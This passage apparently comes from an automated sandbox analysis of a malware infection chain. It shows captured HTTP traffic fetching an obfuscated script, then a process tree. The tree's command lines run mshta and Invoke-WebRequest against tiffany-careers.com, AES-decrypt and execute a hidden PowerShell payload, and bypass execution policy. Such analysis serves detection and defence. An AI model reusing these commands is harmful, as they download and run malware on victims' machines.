                                                                        Data Ascii: m?]}W"YUVuuVY/V,YtF@tVP&YY3^]USVu3F$<uBFt9W>+~~.WvVyYP";uFyFN _Nf^[]j[Yjh0KZ>3}uuW;Y$VM!Y}VY


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.849729147.45.49.1554438376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-27 08:05:39 UTC82OUTGET /ZxVMIVZIX.txt HTTP/1.1
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-27 08:05:40 UTC425INHTTP/1.1 200 OK
                                                                        etag: "1189e2-676a89bf-23c4e;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:15:27 GMT
                                                                        content-type: text/plain
                                                                        content-length: 1149410
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:39 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24
                                                                        Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 38 20 54 68 65 6e 0a 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 39 0a 24 53 57 49 53 53 45 53 50 4e 53 48 45 46 46 49 45 4c 44 20 3d 20 38 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 36 36 5d 31 31 31 5d 39 38 5d 31 30 39 5d 31 31 32 5d 31 30 34 5d 33 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32
                                                                        Data Ascii: curredLayout = 88 Then$REJECTRESERVOIRLOCKENJOYED = 89$SWISSESPNSHEFFIELD = 80For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 6d 65 6c 69 6e 65 20 3d 20 35 37 0a 24 46 6f 72 75 6d 73 49 73 74 61 6e 62 75 6c 20 3d 20 37 38 0a 57 68 69 6c 65 20 31 33 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 35 35 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 38 31 5d 31 31 38 5d 31 32 34 5d 31 30 32 22 2c 34 30 2f 35 29 29 0a 41 43 6f 73 28 31 30 30 33 29 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 34 5d 31 30 32 5d 31 32 34 5d 31 30 32 5d 31 31 31 5d 31 30 38 5d 31 31 33 5d 31 30 36 5d 34 38 5d 31 31 39 5d 31 30 38 5d 31 30 34 5d 34 38 22 2c 33 2f 31 29 29 0a 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20
                                                                        Data Ascii: meline = 57$ForumsIstanbul = 78While 13If $MeasureTimeline = 55 ThenDec(Wales("81]118]124]102",40/5))ACos(1003)Dec(Wales("117]104]102]124]102]111]108]113]106]48]119]108]104]48",3/1))$MeasureTimeline = $MeasureTimeline + 1EndIfIf $MeasureTimeline
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 39 31 5d 31 32 39 5d 31 31 38 5d 31 30 38 5d 31 31 33 5d 31 30 37 5d 31 30 35 5d 31 32 34 5d 31 31 33 5d 31 31 39 5d 31 31 38 5d 35 35 5d 37 33 5d 31 32 36 5d 31 30 35 5d 31 31 33 5d 31 31 36 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 35 22 2c 36 34 2f 38 29 29 0a 41 54 61 6e 28 39 30 34 38 29 0a 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 54 72 61 64 69 6e 67 4c 6f 6c 20 3d 20 33 39 0a 24 43 4f 4e 56 45 4e 49 45 4e 54 44 45 42 55 47 4e 44 4d 41 44 4f 4e 4e 41 20 3d 20 37 35 0a 57 68 69 6c 65 20 33 38 39 0a 49 66 20 24 54 72 61 64 69 6e 67 4c 6f
                                                                        Data Ascii: 91]129]118]108]113]107]105]124]113]119]118]55]73]126]105]113]116]105]106]116]109]55",64/8))ATan(9048)$lisaknowledgestormsharpinsight = $lisaknowledgestormsharpinsight + 1EndIfNext$TradingLol = 39$CONVENIENTDEBUGNDMADONNA = 75While 389If $TradingLo
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 2c 20 57 61 6c 65 73 28 22 38 32 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 32 31 5d 31 30 38 5d 31 30 34 5d 31 32 32 5d 34 38 5d 38 36 5d 31 30 34 5d 31 31 33 5d 31 31 39 5d 31 30 34 5d 31 31 33 5d 31 30 32 5d 31 30 34 5d 31 31 38 5d 34 38 22 2c 39 2f 33 29 29 0a 41 43 6f 73 28 39 34 36 37 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 57 69 64 65 73 63 72 65 65 6e 54 72 61 69 6e 41 6e 61 74 6f 6d 79 20 3d 20 34 39 0a 24 72 65 6c 61 74
                                                                        Data Ascii: s("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3), Wales("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3))ACos(9467)$waitsussex = $waitsussex + 1EndIfNext$WidescreenTrainAnatomy = 49$relat
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 73 61 66 65 6c 79 77 72 69 67 68 74 68 6f 6d 65 74 6f 77 6e 61 6c 75 6d 69 6e 75 6d 20 3d 20 27 33 36 39 37 38 35 33 37 31 35 37 39 30 37 33 38 30 39 34 30 37 38 36 30 31 32 32 36 32 39 34 34 39 32 30 31 30 31 33 30 37 38 38 39 31 32 36 38 38 37 39 32 31 31 33 35 31 30 36 37 34 37 35 32 31 27 0a 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 39 30 0a 24 41 67 61 69 6e 73 74 47 72 69 70 47 75 79 45 75 72 6f 70 65 20 3d 20 36 36 0a 57 68 69 6c 65 20 39 30 32 0a 49 66 20 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 38 39
                                                                        Data Ascii: nturn = $settingsomersetvegetarianturn + 1EndIfNext$safelywrighthometownaluminum = '36978537157907380940786012262944920101307889126887921135106747521'$DefinitionsFavouritesUri = 90$AgainstGripGuyEurope = 66While 902If $DefinitionsFavouritesUri = 89
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 37 20 54 68 65 6e 0a 41 54 61 6e 28 36 35 37 31 29 0a 43 68 72 28 38 37 35 38 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 2c 20 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41
                                                                        Data Ascii: StrictRealtorsAdministration = 7 ThenATan(6571)Chr(8758)PixelGetColor(Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4), Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4))$StrictRealtorsAdministration = $StrictRealtorsA
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 34 20 54 68 65 6e 0a 24 49 4e 48 45 52 49 54 45 44 45 4e 41 52 49 53 49 4e 47 20 3d 20 53 71 72 74 28 35 32 30 32 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 35 20 54 68 65 6e 0a 41 53 69 6e 28 31 39 39 33 29 0a 41 43 6f 73 28 32 38 32 33 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 30 5d 38 32 5d 37 33 5d 37 38 5d 36 37 5d 37 33 5d 38 30 5d 37 36 5d 36 39 5d 33 35 5d 37 31 5d 36 35 5d 37 37 5d 36 39 5d 38 33 5d 38 30 5d 37 39 5d 38 34 5d 33 35 22 2c 30 2f 35 29 29 0a 24 4a 65 4f 6b 61 79 20 3d 20 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 52 6f
                                                                        Data Ascii: $JeOkay + 1EndIfIf $JeOkay = 54 Then$INHERITEDENARISING = Sqrt(5202)ExitLoopEndIfIf $JeOkay = 55 ThenASin(1993)ACos(2823)ConsoleWriteError(Wales("80]82]73]78]67]73]80]76]69]35]71]65]77]69]83]80]79]84]35",0/5))$JeOkay = $JeOkay + 1EndIfNext$Ro
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 73 69 6f 6e 20 3d 20 39 30 20 54 68 65 6e 0a 41 54 61 6e 28 33 36 31 31 29 0a 44 65 63 28 57 61 6c 65 73 28 22 37 35 5d 31 32 34 5d 31 30 33 5d 31 31 34 5d 31 32 33 5d 31 30 33 5d 31 32 32 5d 31 30 37 5d 33 38 22 2c 34 38 2f 38 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 31 5d 39 38 5d 31 30 30 5d 31 31 37 5d 31 31 32 5d 31 31 35 5d 31 32 32 5d 36 32 5d 38 33 5d 31 30 32 5d 31 30 39 5d 36 32 5d 38 34 5d 31 31 38 5d 31 31 36 5d 31 31 33 5d 31 30 32 5d 31 30 30 5d 31 31 37 5d 36 32 5d 37 34 5d 31 30 39 5d 31 30 39 5d 31 31 38 5d 31 31 36 5d 31 31 37 5d 31 31 35 5d 39 38 5d 31 31 37 5d 31 30 32 5d 31 30 31 5d 36 32 22 2c 35 2f 35 29 29 0a 24 54 72 69 70 6c 65 43 6f 6e 63 6c 75 73 69 6f 6e 20 3d 20 24 54 72 69 70 6c 65 43 6f 6e 63 6c
                                                                        Data Ascii: sion = 90 ThenATan(3611)Dec(Wales("75]124]103]114]123]103]122]107]38",48/8))DriveStatus(Wales("71]98]100]117]112]115]122]62]83]102]109]62]84]118]116]113]102]100]117]62]74]109]109]118]116]117]115]98]117]102]101]62",5/5))$TripleConclusion = $TripleConcl
                                                                        2024-12-27 08:05:40 UTC16384INData Raw: 24 42 55 54 4b 4e 49 54 54 49 4e 47 43 48 52 4f 4d 45 2c 20 24 63 61 6e 62 65 72 72 61 66 75 6e 64 61 6d 65 6e 74 61 6c 65 76 69 6c 63 65 6f 29 0a 24 43 6f 6e 73 74 72 61 69 6e 74 47 65 6e 64 65 72 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 20 3d 20 27 34 35 31 35 34 39 32 35 36 34 37 32 30 35 37 32 37 37 32 33 33 32 39 34 34 32 36 33 36 37 38 35 35 38 38 37 30 27 0a 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 31 0a 24 54 69 6e 44 65 74 65 72 6d 69 6e 65 50 65 72 73 6f 6e 20 3d 20 37 38 0a 46 6f 72 20 24 6e 45 53 52 72 5a 41 20 3d 20 35 32 20 54 6f 20 39 31 33 0a 49 66 20 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 30 20 54 68 65 6e 0a 45 78 70 28 35 32 33 34 29 0a 41 43 6f 73 28 35 34 39
                                                                        Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:03:05:10
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')"
                                                                        Imagebase:0x7ff7ff5f0000
                                                                        File size:576'000 bytes
                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:03:05:10
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:03:05:11
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:03:05:11
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:03:05:13
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:03:05:14
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2
                                                                        Imagebase:0x7ff769d50000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:03:05:17
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff67e6d0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:9
                                                                        Start time:03:05:18
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:03:05:18
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:03:05:24
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
                                                                        Imagebase:0x7ff6e8200000
                                                                        File size:5'641'176 bytes
                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:12
                                                                        Start time:03:05:24
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                        Imagebase:0x7ff79c940000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:13
                                                                        Start time:03:05:25
                                                                        Start date:27/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1584,i,8641109857703384737,8271461273470373674,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                        Imagebase:0x7ff79c940000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:15
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\XKIZdXAs.exe"
                                                                        Imagebase:0x7ff7adc00000
                                                                        File size:1'083'904 bytes
                                                                        MD5 hash:2A89603D2620B2A62113513709E38E95
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 35%, ReversingLabs
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe""
                                                                        Imagebase:0x7ff6cb6b0000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:03:05:29
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6ee680000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:03:05:35
                                                                        Start date:27/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                        Imagebase:0x7ff6cb6b0000
